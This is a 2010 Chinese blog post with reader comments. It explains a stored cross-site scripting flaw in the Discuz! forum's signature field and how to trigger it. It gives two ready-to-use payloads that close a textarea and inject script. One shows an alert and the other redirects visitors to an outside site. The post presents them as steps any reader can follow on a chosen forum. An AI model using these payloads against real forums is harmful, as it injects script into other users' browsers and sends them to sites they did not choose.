Oct 21, 2010

9 Comments

最新Discuz!跨站个人签名漏洞

最新Discuz!跨站个人签名漏洞

由于DZ论坛的对个性能签名字符过虑不严导致XSS跨站角本可以执行

随便选个 Discuz! 论坛我们注册一个用户!

并输入跨站脚本代码，以我们个人的签名

</textarea><script>alert(/瑶哥博客/);</script><textarea>

也可以写成这样:</textarea><script>alert(/欢迎访问/);location.href=/http://yaoge.me/;</script><textarea>

最后更新于 2010-10-21 13:13:11 并被添加「dz 签名漏洞」标签，已有 4151 位童鞋阅读过。

本站使用「署名 4.0 国际」创作共享协议，可自由转载、引用，但需署名作者且注明文章出处

已有 9 条评论

XSS跨站。。。。

crll January 19th, 2011 at 05:51 am 回复
呵呵谢谢博主

N倍高 November 3rd, 2010 at 11:19 am 回复
1. @N倍高
  
  官方也有提到些漏洞，只是没有官方人员出来说明并修复
  
  瑶哥 November 3rd, 2010 at 01:53 pm 回复
至今不知道签名到底咋回事，好像很重要，没人教过

制砂机 October 26th, 2010 at 10:27 am 回复
1. @制砂机
  
  有人为了个性，有人为了宣传
  
  瑶哥 October 26th, 2010 at 11:41 am 回复
额，收藏了，可能会用上

freemouse October 22nd, 2010 at 01:38 pm 回复
1. @freemouse
  
  利用价值不大，在帖子页面没有反应，要在个人资料页面才有反应！
  
  瑶哥 October 22nd, 2010 at 03:06 pm 回复
果断沙发呵呵

签名 October 21st, 2010 at 10:46 pm 回复
1. @签名
  
  谢谢来访！@
  
  瑶哥 October 22nd, 2010 at 03:07 pm 回复

发表新评论